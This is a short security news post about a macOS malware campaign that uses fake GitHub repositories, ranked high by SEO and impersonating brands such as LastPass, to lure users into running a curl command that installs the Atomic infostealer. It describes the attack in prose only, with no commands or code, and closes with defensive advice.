This post is also available in:
עברית (Hebrew)
A recent campaign targeting macOS users is exploiting public trust in well-known software brands by distributing malicious installers through fraudulent GitHub repositories. The attackers are delivering the “Atomic” infostealer malware, which is capable of harvesting sensitive user data.
This method involves impersonating reputable companies—including password managers, financial apps, and open-source tools—by creating GitHub pages that appear legitimate. Brands being spoofed include LastPass, 1Password, Thunderbird, Audacity, Robinhood, Shopify, and others.
To increase visibility, the attackers are employing search engine optimization (SEO) techniques to push their malicious links to the top of search results on platforms like Google and Bing. Users searching for software downloads that include terms like “GitHub” and “macOS” may be directed to one of these pages.
These GitHub repositories contain familiar branding, logos, and language to appear authentic. However, visitors are prompted to execute a command in the macOS terminal, typically using a curl command. This command retrieves a hidden (Base64-encoded) URL, which in turn downloads and runs a shell script.
The shell script is responsible for installing the Atomic infostealer. Once active, the malware can extract passwords, browser information, and other sensitive information stored on the user’s system.
The campaign was flagged by LastPass’s Threat Intelligence, Mitigation, and Escalation (TIME) team, who released technical details and indicators of compromise (IoCs) to assist other security teams in identifying and mitigating the threat. The team also noted that takedown and disruption efforts are underway.
This attack highlights a growing trend of using developer-focused platforms like GitHub to distribute malware. It also underscores the importance of verifying software sources—especially when prompted to run terminal commands.
Security professionals are advised to monitor for unusual network activity, scrutinize installation sources, and educate end users on the risks of installing software from unofficial or unfamiliar repositories.
